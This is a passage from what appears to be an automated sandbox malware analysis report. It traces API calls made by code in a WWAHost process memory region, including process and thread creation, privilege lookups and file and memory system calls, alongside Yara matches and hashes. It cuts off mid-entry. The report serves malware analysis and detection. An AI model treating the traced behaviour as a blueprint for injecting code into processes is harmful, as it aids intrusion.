32044->32045 32046 a7abe0 LdrLoadDll 32045->32046 32047 a7ae03 32046->32047 32048 a7abe0 LdrLoadDll 32047->32048 32049 a7ae0f 32048->32049 32050 a7abe0 LdrLoadDll 32049->32050 32051 a7ae18 32050->32051 32052 a7abe0 LdrLoadDll 32051->32052 32053 a7ae21 32052->32053 32054 a7abe0 LdrLoadDll 32053->32054 32055 a7ae2a 32054->32055 32056 a7abe0 LdrLoadDll 32055->32056 32057 a7ae33 32056->32057 32058 a7abe0 LdrLoadDll 32057->32058 32059 a7ae3c 32058->32059 32060 a7abe0 LdrLoadDll 32059->32060 32061 a7ae48 32060->32061 32062 a7abe0 LdrLoadDll 32061->32062 32063 a7ae51 32062->32063 32064 a7abe0 LdrLoadDll 32063->32064 32065 a7ae5a 32064->32065 32066 a7abe0 LdrLoadDll 32065->32066 32067 a7ae63 32066->32067 32068 a7abe0 LdrLoadDll 32067->32068 32069 a7ae6c 32068->32069 32070 a7abe0 LdrLoadDll 32069->32070 32071 a7ae75 32070->32071 32072 a7abe0 LdrLoadDll 32071->32072 32073 a7ae81 32072->32073 32074 a7abe0 LdrLoadDll 32073->32074 32075 a7ae8a 32074->32075 32076 a7abe0 LdrLoadDll 32075->32076 32077 a7ae93 32076->32077 32078 a7abe0 LdrLoadDll 32077->32078 32079 a7ae9c 32078->32079 32080 a7abe0 LdrLoadDll 32079->32080 32081 a7aea5 32080->32081 32082 a7abe0 LdrLoadDll 32081->32082 32083 a7aeae 32082->32083 32084 a7abe0 LdrLoadDll 32083->32084 32085 a7aeba 32084->32085 32086 a7abe0 LdrLoadDll 32085->32086 32087 a7aec3 32086->32087 32088 a7abe0 LdrLoadDll 32087->32088 32089 a7aecc 32088->32089 32089->31867 32091 a7af60 LdrLoadDll 32090->32091 32092 a79e8c 32091->32092 32093 a79ea3 32092->32093 32117 3999860 LdrInitializeThunk 32092->32117 32093->31799 32095->31864 32097 a7d0a6 32096->32097 32098 a7d0a0 32096->32098 32099 a7c0b0 2 API calls 32097->32099 32098->31972 32100 a7d0cc 32099->32100 32100->31972 32102 a7d130 32101->32102 32103 a7d18d 32102->32103 32104 a7c0b0 2 API calls 32102->32104 32103->31983 32105 a7d16a 32104->32105 32106 a7bee0 2 API calls 32105->32106 32106->32103 32108 a74f74 32107->32108 32109 a7bee0 2 API calls 32107->32109 32108->31991 32109->32108 32110->31976 
32112 a7abfb 32111->32112 32113 a75a90 LdrLoadDll 32112->32113 32114 a7ac1b 32113->32114 32115 a75a90 LdrLoadDll 32114->32115 32116 a7accf 32114->32116 32115->32116 32116->32015 32116->32116 32117->32093 32119 399968f LdrInitializeThunk 32118->32119 32120 3999681 32118->32120 32119->31873 32120->31873 32122 a7af60 LdrLoadDll 32121->32122 32123 a7a63c RtlFreeHeap 32122->32123 32123->31877 32125 a67220 32124->32125 32126 a6721b 32124->32126 32127 a7be60 2 API calls 32125->32127 32126->31807 32130 a67245 32127->32130 32128 a672a8 32128->31807 32129 a79e70 2 API calls 32129->32130 32130->32128 32130->32129 32131 a672ae 32130->32131 32135 a7be60 2 API calls 32130->32135 32140 a7a570 32130->32140 32133 a672d4 32131->32133 32134 a7a570 2 API calls 32131->32134 32133->31807 32136 a672c5 32134->32136 32135->32130 32136->31807 32138 a7a570 2 API calls 32137->32138 32139 a674ee 32138->32139 32139->31764 32141 a7a576 32140->32141 32142 a7af60 LdrLoadDll 32141->32142 32143 a7a58c 32142->32143 32146 39996e0 LdrInitializeThunk 32143->32146 32144 a7a5a3 32144->32130 32146->32144 32148 a7b623 32147->32148 32149 a6a130 LdrLoadDll 32148->32149 32150 a6905a 32149->32150 32150->31770 32152 a6a4a3 32151->32152 32154 a6a520 32152->32154 32166 a79c40 LdrLoadDll 32152->32166 32154->31777 32156 a7af60 LdrLoadDll 32155->32156 32157 a6d59b 32156->32157 32157->31785 32158 a7a780 32157->32158 32159 a7af60 LdrLoadDll 32158->32159 32160 a7a79f LookupPrivilegeValueW 32159->32160 32160->31781 32162 a7af60 LdrLoadDll 32161->32162 32163 a7a22c 32162->32163 32167 3999910 LdrInitializeThunk 32163->32167 32164 a7a24b 32164->31784 32166->32154 32167->32164 32169 a6a627 32168->32169 32170 a6a480 LdrLoadDll 32169->32170 32171 a6a656 32170->32171 32171->31723 32173 a6a374 32172->32173 32228 a79c40 LdrLoadDll 32173->32228 32175 a6a3ae 32175->31725 32177 a6d78c 32176->32177 32178 a6a600 LdrLoadDll 32177->32178 32179 a6d79e 32178->32179 32229 a6d670 32179->32229 32182 a6d7d1 32186 a7a440 2 API calls 
32182->32186 32187 a6d7e2 32182->32187 32183 a6d7b9 32184 a7a440 2 API calls 32183->32184 32185 a6d7c4 32183->32185 32184->32185 32185->31728 32186->32187 32187->31728 32189 a6b4d6 32188->32189 32190 a6b4e0 32188->32190 32189->31737 32191 a6a480 LdrLoadDll 32190->32191 32192 a6b551 32191->32192 32193 a6a350 LdrLoadDll 32192->32193 32194 a6b565 32193->32194 32195 a6b588 32194->32195 32196 a6a480 LdrLoadDll 32194->32196 32195->31737 32197 a6b5a4 32196->32197 32198 a75690 8 API calls 32197->32198 32199 a6b5f9 32198->32199 32199->31737 32201 a6c056 32200->32201 32202 a6a480 LdrLoadDll 32201->32202 32203 a6c06a 32202->32203 32248 a6bd20 32203->32248 32205 a6858c 32226 a6b610 LdrLoadDll 32205->32226 32277 a6da20 32206->32277 32208 a68233 32220 a68431 32208->32220 32282 a74fe0 32208->32282 32210 a68292 32210->32220 32285 a67fd0 32210->32285 32213 a7d090 2 API calls 32214 a682d9 32213->32214 32215 a7d1c0 3 API calls 32214->32215 32217 a682ee 32215->32217 32216 a67210 4 API calls 32223 a68340 32216->32223 32217->32223 32344 a63660 10 API calls 32217->32344 32220->31749 32223->32216 32223->32220 32224 a674d0 2 API calls 32223->32224 32290 a6b1f0 32223->32290 32340 a6d9c0 32223->32340 32345 a6d4a0 21 API calls 32223->32345 32224->32223 32225->31732 32226->31742 32227->31746 32228->32175 32230 a6d740 32229->32230 32231 a6d68a 32229->32231 32230->32182 32230->32183 32232 a6a480 LdrLoadDll 32231->32232 32233 a6d6ac 32232->32233 32239 a79ef0 32233->32239 32235 a6d6ee 32242 a79f30 32235->32242 32238 a7a440 2 API calls 32238->32230 32240 a7af60 LdrLoadDll 32239->32240 32241 a79f0c 32239->32241 32240->32241 32241->32235 32243 a79f4c 32242->32243 32244 a7af60 LdrLoadDll 32242->32244 32247 3999fe0 LdrInitializeThunk 32243->32247 32244->32243 32245 a6d734 32245->32238 32247->32245 32249 a6bd37 32248->32249 32257 a6da60 32249->32257 32253 a6bdab 32254 a6bdb2 32253->32254 32268 a7a250 LdrLoadDll 32253->32268 32254->32205 32256 a6bdc5 32256->32205 32258 a6da85 32257->32258 32269 a67510 
32258->32269 32260 a6bd7f 32265 a7a690 32260->32265 32261 a6daa9 32261->32260 32262 a75690 8 API calls 32261->32262 32264 a7bee0 2 API calls 32261->32264 32276 a6d8a0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 32261->32276 32262->32261 32264->32261 32266 a7af60 LdrLoadDll 32265->32266 32267 a7a6af CreateProcessInternalW 32266->32267 32267->32253 32268->32256 32270 a6760f 32269->32270 32271 a67525 32269->32271 32270->32261 32271->32270 32272 a75690 8 API calls 32271->32272 32274 a67592 32272->32274 32273 a675b9 32273->32261 32274->32273 32275 a7bee0 2 API calls 32274->32275 32275->32273 32276->32261 32278 a75a90 LdrLoadDll 32277->32278 32279 a6da3f 32278->32279 32280 a6da46 SetErrorMode 32279->32280 32281 a6da4d 32279->32281 32280->32281 32281->32208 32346 a6d7f0 32282->32346 32284 a75006 32284->32210 32286 a7be60 2 API calls 32285->32286 32289 a67ff5 32286->32289 32287 a68210 32287->32213 32289->32287 32365 a79830 32289->32365 32291 a6b20f 32290->32291 32292 a6b209 32290->32292 32423 a68c20 32291->32423 32414 a6d2b0 32292->32414 32295 a6b21c 32296 a6b4b2 32295->32296 32297 a7d1c0 3 API calls 32295->32297 32296->32223 32298 a6b238 32297->32298 32299 a6b24c 32298->32299 32300 a6d9c0 2 API calls 32298->32300 32432 a79cc0 32299->32432 32300->32299 32303 a6b380 32448 a6b190 LdrLoadDll LdrInitializeThunk 32303->32448 32304 a79eb0 2 API calls 32305 a6b2ca 32304->32305 32305->32303 32309 a6b2d6 32305->32309 32307 a6b39f 32308 a6b3a7 32307->32308 32449 a6b100 LdrLoadDll NtClose LdrInitializeThunk 32307->32449 32310 a7a440 2 API calls 32308->32310 32309->32296 32312 a6b329 32309->32312 32315 a79fc0 2 API calls 32309->32315 32313 a6b3b1 32310->32313 32316 a7a440 2 API calls 32312->32316 32313->32223 32314 a6b3c9 32314->32308 32317 a6b3d0 32314->32317 32315->32312 32318 a6b346 32316->32318 32319 a6b3e8 32317->32319 32450 a6b080 LdrLoadDll LdrInitializeThunk 32317->32450 32435 a792e0 32318->32435 32451 a79d40 LdrLoadDll 32319->32451 32323 a6b3fc 32452 a6af00 
LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32323->32452 32324 a6b35d 32324->32296 32438 a67680 32324->32438 32326 a6b420 32329 a6b46d 32326->32329 32453 a79d70 LdrLoadDll 32326->32453 32455 a79dd0 LdrLoadDll 32329->32455 32332 a6b43e 32332->32329 32454 a79e00 LdrLoadDll 32332->32454 32333 a6b47b 32334 a7a440 2 API calls 32333->32334 32335 a6b485 32334->32335 32336 a7a440 2 API calls 32335->32336 32338 a6b48f 32336->32338 32338->32296 32339 a67680 3 API calls 32338->32339 32339->32296 32341 a6d9d3 32340->32341 32529 a79e40 32341->32529 32344->32223 32345->32223 32347 a6d80d 32346->32347 32353 a79f70 32347->32353 32350 a6d855 32350->32284 32354 a79f8c 32353->32354 32355 a7af60 LdrLoadDll 32353->32355 32363 39999a0 LdrInitializeThunk 32354->32363 32355->32354 32356 a6d84e 32356->32350 32358 a79fc0 32356->32358 32359 a79fdc 32358->32359 32360 a7af60 LdrLoadDll 32358->32360 32364 3999780 LdrInitializeThunk 32359->32364 32360->32359 32361 a6d87e 32361->32284 32363->32356 32364->32361 32366 a7c0b0 2 API calls 32365->32366 32367 a79847 32366->32367 32386 a68760 32367->32386 32369 a79862 32370 a798a0 32369->32370 32371 a79889 32369->32371 32374 a7be60 2 API calls 32370->32374 32372 a7bee0 2 API calls 32371->32372 32373 a79896 32372->32373 32373->32287 32375 a798da 32374->32375 32376 a7be60 2 API calls 32375->32376 32377 a798f3 32376->32377 32383 a79b94 32377->32383 32392 a7bea0 LdrLoadDll 32377->32392 32379 a79b79 32380 a79b80 32379->32380 32379->32383 32381 a7bee0 2 API calls 32380->32381 32382 a79b8a 32381->32382 32382->32287 32384 a7bee0 2 API calls 32383->32384 32385 a79be9 32384->32385 32385->32287 32387 a68785 32386->32387 32388 a6a130 LdrLoadDll 32387->32388 32389 a687b8 32388->32389 32391 a687dd 32389->32391 32393 a6b930 32389->32393 32391->32369 32392->32379 32394 a6b95c 32393->32394 32395 a7a190 LdrLoadDll 32394->32395 32396 a6b975 32395->32396 32397 a6b97c 32396->32397 32404 a7a1d0 32396->32404 32397->32391 32401 a6b9b7 32402 a7a440 2 API calls 
32401->32402 32403 a6b9da 32402->32403 32403->32391 32405 a7a1de 32404->32405 32406 a7af60 LdrLoadDll 32405->32406 32407 a7a1ec 32406->32407 32413 3999710 LdrInitializeThunk 32407->32413 32408 a6b99f 32408->32397 32410 a7a7c0 32408->32410 32411 a7a7df 32410->32411 32412 a7af60 LdrLoadDll 32410->32412 32411->32401 32412->32411 32413->32408 32415 a6d2c7 32414->32415 32456 a6c3a0 32414->32456 32422 a6d2e0 32415->32422 32469 a64000 32415->32469 32418 a7c0b0 2 API calls 32420 a6d2ee 32418->32420 32419 a6d2da 32496 a79160 32419->32496 32420->32291 32422->32418 32425 a68c3b 32423->32425 32424 a68d5b 32424->32295 32425->32424 32426 a6d670 3 API calls 32425->32426 32427 a68d3c 32426->32427 32428 a68d6a 32427->32428 32429 a68d51 32427->32429 32430 a7a440 2 API calls 32427->32430 32428->32295 32528 a66290 LdrLoadDll 32429->32528 32430->32429 32433 a6b2a0 32432->32433 32434 a7af60 LdrLoadDll 32432->32434 32433->32296 32433->32303 32433->32304 32434->32433 32436 a6d9c0 2 API calls 32435->32436 32437 a79312 32436->32437 32437->32324 32439 a67698 32438->32439 32440 a6a130 LdrLoadDll 32439->32440 32441 a676b3 32440->32441 32442 a75a90 LdrLoadDll 32441->32442 32443 a676c3 32442->32443 32444 a676cc PostThreadMessageW 32443->32444 32446 a676fd 32443->32446 32445 a676e0 32444->32445 32444->32446 32447 a676ea PostThreadMessageW 32445->32447 32446->32223 32447->32446 32448->32307 32449->32314 32450->32319 32451->32323 32452->32326 32453->32332 32454->32329 32455->32333 32457 a6c3d3 32456->32457 32501 a6a740 32457->32501 32459 a6c3e5 32505 a6a8b0 32459->32505 32461 a6c403 32462 a6a8b0 LdrLoadDll 32461->32462 32463 a6c419 32462->32463 32464 a6d7f0 3 API calls 32463->32464 32465 a6c43d 32464->32465 32466 a6c444 32465->32466 32467 a7c0f0 2 API calls 32465->32467 32466->32415 32468 a6c454 32467->32468 32468->32415 32470 a6402c 32469->32470 32471 a6b930 3 API calls 32470->32471 32473 a64103 32471->32473 32472 a64695 32472->32419 32473->32472 32508 a7c130 32473->32508 32475 a6416e 32476 a6a480 
LdrLoadDll 32475->32476 32477 a642f4 32476->32477 32478 a6a480 LdrLoadDll 32477->32478 32479 a64318 32478->32479 32512 a6b9f0 32479->32512 32483 a643b3 32484 a64479 32483->32484 32485 a6b9f0 2 API calls 32483->32485 32487 a7be60 2 API calls 32484->32487 32486 a64452 32485->32486 32486->32484 32488 a7a0d0 2 API calls 32486->32488 32489 a644e6 32487->32489 32488->32484 32490 a7be60 2 API calls 32489->32490 32491 a644ff 32490->32491 32491->32472 32492 a6a480 LdrLoadDll 32491->32492 32493 a64547 32492->32493 32494 a6a350 LdrLoadDll 32493->32494 32495 a645f9 32494->32495 32495->32419 32497 a75a90 LdrLoadDll 32496->32497 32499 a79181 32497->32499 32498 a791a7 32498->32422 32499->32498 32500 a79194 CreateThread 32499->32500 32500->32422 32502 a6a767 32501->32502 32503 a6a480 LdrLoadDll 32502->32503 32504 a6a7a3 32503->32504 32504->32459 32506 a6a480 LdrLoadDll 32505->32506 32507 a6a8c9 32505->32507 32506->32507 32507->32461 32509 a7c13d 32508->32509 32510 a75a90 LdrLoadDll 32509->32510 32511 a7c150 32510->32511 32511->32475 32513 a6ba15 32512->32513 32521 a7a040 32513->32521 32516 a7a0d0 32517 a7af60 LdrLoadDll 32516->32517 32518 a7a0ec 32517->32518 32527 3999650 LdrInitializeThunk 32518->32527 32519 a7a10b 32519->32483 32522 a7af60 LdrLoadDll 32521->32522 32523 a7a05c 32522->32523 32526 39996d0 LdrInitializeThunk 32523->32526 32524 a6438c 32524->32483 32524->32516 32526->32524 32527->32519 32528->32424 32530 a7af60 LdrLoadDll 32529->32530 32531 a79e5c 32530->32531 32534 3999840 LdrInitializeThunk 32531->32534 32532 a6d9fe 32532->32223 32534->32532

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 571 a7a362-a7a36e 572 a7a370-a7a3b9 call a7af60 571->572 573 a7a35a-a7a361 NtCreateFile 571->573
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000005,00000000,00A757F7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00A757F7,00000000,00000005,00000060,00000000,00000000), ref: 00A7A35D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: b8b1eca4023a4224850d0a7766588fd8bf7e5694ba4b3bfc33043a2d150a0a9c
                                              • Instruction ID: 1eb54bf31701ae405ed57ad771eef8b3c71f5a6600e83bccd1d9f6261a1a5f69
                                              • Opcode Fuzzy Hash: b8b1eca4023a4224850d0a7766588fd8bf7e5694ba4b3bfc33043a2d150a0a9c
                                              • Instruction Fuzzy Hash: A9016DB62001087FCB04DF98DC85DEB77ADEF8C714F158219FA0D97200D630E8118BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 592 a7a3ba-a7a3bc 593 a7a3be-a7a409 call a7af60 NtReadFile 592->593 594 a7a428-a7a439 592->594
                                              APIs
                                              • NtReadFile.NTDLL(00A759B2,5DA515B3,FFFFFFFF,00A75671,00000206,?,00A759B2,00000206,00A75671,FFFFFFFF,5DA515B3,00A759B2,00000206,00000000), ref: 00A7A405
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: ba7d17e1ab1e577a1e06a908f81c5c003ca4133987aba70ea4fc1b5d1209730a
                                              • Instruction ID: ede7d9d811b4a2a2d363c6e55febb2499c9f4ed7ccbad51a603caae63b802cac
                                              • Opcode Fuzzy Hash: ba7d17e1ab1e577a1e06a908f81c5c003ca4133987aba70ea4fc1b5d1209730a
                                              • Instruction Fuzzy Hash: 050128B6200208AFDB14DF98DC81DDB77A9EF8C754F158249FE1D97241D630E911CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 598 a7a30a-a7a30e 599 a7a310-a7a335 call a7af60 598->599 600 a7a338-a7a361 NtCreateFile 598->600 599->600
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000005,00000000,00A757F7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00A757F7,00000000,00000005,00000060,00000000,00000000), ref: 00A7A35D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 32f7e0c1916e3533ce71feb1a096f2378f59f5777a5a2596ddc91a6e9e26e58c
                                              • Instruction ID: af1cc20d126cc72eeaf4d5d80d9ee54fc5de1fc221aab8208aeff4af8c06de5b
                                              • Opcode Fuzzy Hash: 32f7e0c1916e3533ce71feb1a096f2378f59f5777a5a2596ddc91a6e9e26e58c
                                              • Instruction Fuzzy Hash: 8801AFB6215208BBCB18DF89DC85EEB77ADAF8C754F118258FA0D97241D630E8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000005,00000000,00A757F7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00A757F7,00000000,00000005,00000060,00000000,00000000), ref: 00A7A35D
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                              • Instruction ID: a5eb3c8dd1140d9272079295a8639aacd8903b2cc18265463bf31ea739d1617e
                                              • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                              • Instruction Fuzzy Hash: E6F06DB6215208AFCB48DF89DC95EEB77ADAF8C754F118248FA0D97241D630F8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtReadFile.NTDLL(00A759B2,5DA515B3,FFFFFFFF,00A75671,00000206,?,00A759B2,00000206,00A75671,FFFFFFFF,5DA515B3,00A759B2,00000206,00000000), ref: 00A7A405
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                              • Instruction ID: 461a2e37bf96e54d497b9c65a72347570f92fd5016063989958e3a82315ea3c3
                                              • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                              • Instruction Fuzzy Hash: 48F0A4B2200208ABCB14DF99DC85EEB77ADEF8C754F118248FA0D97241D630E811CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A62D11,00002000,00003000,00000004), ref: 00A7A529
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                              • Instruction ID: 3b74d1da40cb733c983e3c2292bca8844ecf40ffeb61d7921b849dca3b5de6c2
                                              • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                              • Instruction Fuzzy Hash: 49F0FBB2210208ABDB18DF89DC81EAB77ADAF88654F118208FA0C97241C630E8108BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A62D11,00002000,00003000,00000004), ref: 00A7A529
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 8634ee6ed7bfca7443beaefcd15ddafe59e3c79bb15027a68cbb6190d0aba2a6
                                              • Instruction ID: fac25125c3da6aa4af934090c7b326891b56740244602550c64597c75ee8b994
                                              • Opcode Fuzzy Hash: 8634ee6ed7bfca7443beaefcd15ddafe59e3c79bb15027a68cbb6190d0aba2a6
                                              • Instruction Fuzzy Hash: 2AE06DB11001496BCB04DF98DC84CAB77A8EF88214B15C64DFD5C97202C230E810CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A62D11,00002000,00003000,00000004), ref: 00A7A529
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: a6ba039d40078b57a8e6a5020a7563452cc8b7e99234bda18bf8aa51e7f7e803
                                              • Instruction ID: 57572923b40a41b4d90eee22375ed9bcaa6cc5b601d09cf83eb69468cf8a69c8
                                              • Opcode Fuzzy Hash: a6ba039d40078b57a8e6a5020a7563452cc8b7e99234bda18bf8aa51e7f7e803
                                              • Instruction Fuzzy Hash: 06E012B6204549AFCB04DF58DC91CAB77A9EF98324B10C309F96D83245C635D8118BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtClose.NTDLL(00A75990,00000206,?,00A75990,00000005,FFFFFFFF), ref: 00A7A465
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 0ca211cdc27ca343ba54fe3d9302d7d8781cfd5c11fab4473d64bedbb8ba02ae
                                              • Instruction ID: 9949b3fd926c15fb1633340584caabf04a42dddcb0b1728b49e192161648748a
                                              • Opcode Fuzzy Hash: 0ca211cdc27ca343ba54fe3d9302d7d8781cfd5c11fab4473d64bedbb8ba02ae
                                              • Instruction Fuzzy Hash: 20E08C722442106ED720DBA8CC8AE9B7B98DF49220F10C298FA9D9B283C531E601C7A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtClose.NTDLL(00A75990,00000206,?,00A75990,00000005,FFFFFFFF), ref: 00A7A465
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_a60000_WWAHost.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                              • Instruction ID: e0d89d5954e8a78a2fd36009e7db0b0294b0197bd04312b0b887b2c42ec3b2a7
                                              • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                              • Instruction Fuzzy Hash: 65D01772200218BBD620EB98DC89E9B7BACDF88A60F118055FA4C5B242C530FA0086E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 2d55ba4e611c008abab427971523095a2fce012b500a6d0912159ae73f385d66
                                              • Instruction ID: a8dada2353cdf9b022449096b0ddb36b047e694fd286b34b3a8e5e80d8abf401
                                              • Opcode Fuzzy Hash: 2d55ba4e611c008abab427971523095a2fce012b500a6d0912159ae73f385d66
                                              • Instruction Fuzzy Hash: AF900261211D4452D200A56D4C24B07005597D0347F91C215A0144594CCE55886165A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1cd232d3a5b243bb06ab8d6e69ae08501d2571145905ff631ae5168b9e5d9234
                                              • Instruction ID: 757c11c473d78f79a5365519b2556be8f478889b3b17b3d43dca283d9ef130d1
                                              • Opcode Fuzzy Hash: 1cd232d3a5b243bb06ab8d6e69ae08501d2571145905ff631ae5168b9e5d9234
                                              • Instruction Fuzzy Hash: 939002A134154852D100A15D4424B060055D7E1345F91C115E1054594D8B59CC5271A6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 30f3e2d3f3dd8beef991e374b68dccf34926be16a725a4ffd8bdeb7dd105990e
                                              • Instruction ID: 902b276740582f8924b91c435b7a836592c54556039be82e1e80f5af82fdf6f3
